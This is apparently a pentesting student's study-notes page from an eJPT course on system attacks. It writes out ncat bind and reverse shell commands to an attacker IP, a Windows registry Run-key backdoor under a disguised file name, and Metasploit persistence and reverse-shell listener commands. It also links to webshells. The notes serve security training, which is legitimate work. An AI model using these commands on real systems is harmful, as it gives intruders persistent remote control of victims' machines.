ShifraBlog
  • Shifra Blog 😀
  • Math🔬
    • Math Articles
      • Applied Mathematics
  • Write Up📝
    • INE ePTS
      • Black Box 1
      • Black Box 2
      • Black Box 3
      • Black Box 3 - Remastered
    • Log4j Vulnerability (Log4Shell)
  • PenTesting🧪
    • eJPT
      • 🔎Reconnaissance
      • 🐱‍💻Google Dorks
      • 🌐Web Attacks
      • ⚙️System Attacks
      • 📶Network Attacks
      • 🔐Password Attacks
      • 💻Networking
      • Pentesting Approach
  • Tools 🧰
    • Nmap
    • Shodan
    • 🐱‍👤Hashcat
    • 🐲Hydra
    • 🔍Nessus
    • 🔬Metasploit
      • Meterpreter
    • 👂Netcat
  • ☁️Database / Servers
    • 👨‍💻Access Tricks
  • 🛂Physical Pentesting
    • 🔑Lost Passwords
Powered by GitBook
On this page
  • Classification:
  • 🚪Backdoor
  • Ncat
  • Metasploit
  • 🔐Password Attacks
  • 💦Buffer Overflow
  • Shell:

Was this helpful?

  1. PenTesting🧪
  2. eJPT

⚙️System Attacks

Notes regarding Sys. Attacks from ePTS course + other recourses.

Previous🌐Web AttacksNext📶Network Attacks

Last updated 3 years ago

Was this helpful?

Classification:

🚪Backdoor

Ncat

ncat [options] [hostname] [port]

install it in the victim machine and run it with these commands:

ncat -l -p 5555 -e cmd.exe

-l listen -e: excute file we choose cmd so we can excute commands.

attacker will

ncat [victim_ip] 5555

can also be executed as a reverse listener especially when the target is on another network:

in the Attacker machine listen:

ncat -l -p 5555 -v

-v: for verbose give us output.

in the target machine:

ncat -e cmd.exe {attacker_ip} 5555

Persistent Backdoor:

in windows Register Editor in `HKEY_LOCALMACHINE\SOFTWARE\Microsoft\CurrentVersion\Run` we add string value for our ncat (or whatever we name it in the target machine) add command to run :

which's the path to ncat (here it's re-named as winconfig) {Attacker_IP} {Port} -e cmd.exe

then restart the victim machine.

as soon as they logged in the attacker who's listening will et a shell.

Metasploit

using the Meterpreter (which's just like ncat above but with steroids).

Get persistence in target machine:

after hacking one machine you will have already a session that you can browse with sessions command:

use exploit/windows/loca/s4u_persistence

sessions //see all the sessions you have
set session <ID> //pick session to stay persistent

set trigger logon //whenever target login you will have conn

set payload windows/meterpreter/reverse_tcp //whatever payload

//same as the attack you used to gain access from first place and gett ths session
set lhost <your_IP> 
set lport <open_Port>

starter listener:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
exploit

🔐Password Attacks

💦Buffer Overflow

Shell:

a program that executes commands, check this to see various languages and ways to execute a system commands(getting a shell):

open source webshells (read them before uploading them to a web server):

is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.

Meterpreter:
🔐Password Attacks
Execute a system command - Rosetta Code
Logo
GitHub - tennc/webshell: This is a webshell open source projectGitHub
Logo